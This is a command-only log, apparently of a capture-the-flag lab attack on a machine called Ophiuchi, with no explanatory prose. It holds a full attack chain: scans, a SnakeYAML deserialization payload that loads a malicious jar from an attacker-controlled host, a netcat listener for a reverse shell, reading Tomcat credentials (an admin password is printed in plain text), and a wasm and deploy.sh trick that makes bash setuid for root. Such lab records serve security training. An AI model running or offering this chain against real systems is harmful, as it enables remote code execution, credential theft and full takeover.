nmap -A -p- -oA ophiuchi 10.129.152.152 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA ophiuchi 10.129.152.152

nmap -sU -O -p- -oA ophiuchi-udp 10.129.152.152

nikto -h 10.129.152.152:80

whatweb http://10.129.152.152

http://10.129.152.152:8080

git clone https://github.com/artsploit/yaml-payload

tree -fs

nmap -p8080 10.129.152.152 --script http-enum -oN webScan

http://10.129.152.152:8080/manager

cat src/artsploit/AwesomeScriptEngineFactory.java

javac src/artsploit/AwesomeScriptEngineFactory.java

jar -cvf yaml-payload.jar -C src/ .

python3 -m http.server 80

nc -lvnp 443

!!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL ["http://10.10.14.20/yaml-payload.jar"] ]] ]

cat /opt/tomcat/conf/tomcat-users.xml

Credenciales-> admin:whythereisalimit

su admin

sudo -l

cd /tmp

ls -l /opt/wasm-functions

cat /opt/wasm-functions/index.go

cp /opt/wasm-functions/main.wasm .

touch deploy.sh

ls -l /bin/bash

vim deploy.sh

sudo /usr/bin/go run /opt/wasm-functions/index.go

git clone --recursive https://github.com/WebAssembly/wabt

cd wabt

git submodule update --init

mkdir build

cmake ..

cmake --build .

python3 -m http.server 8082

wget http://10.129.152.152:8082/main.wasm

./wasm2wat ../../main.wasm

./wasm2wat ../../main.wasm > main.wat

cat main.wat

rm main.wasm

./wat2wasm main.wat > main.wasm

python3 -m http.server 80

cd tmp

wget http://10.10.14.26/main.wasm

chmod +x main.wasm

ls -l /bin/bash

cat deploy.sh

ls -l /bin/bash

bash -p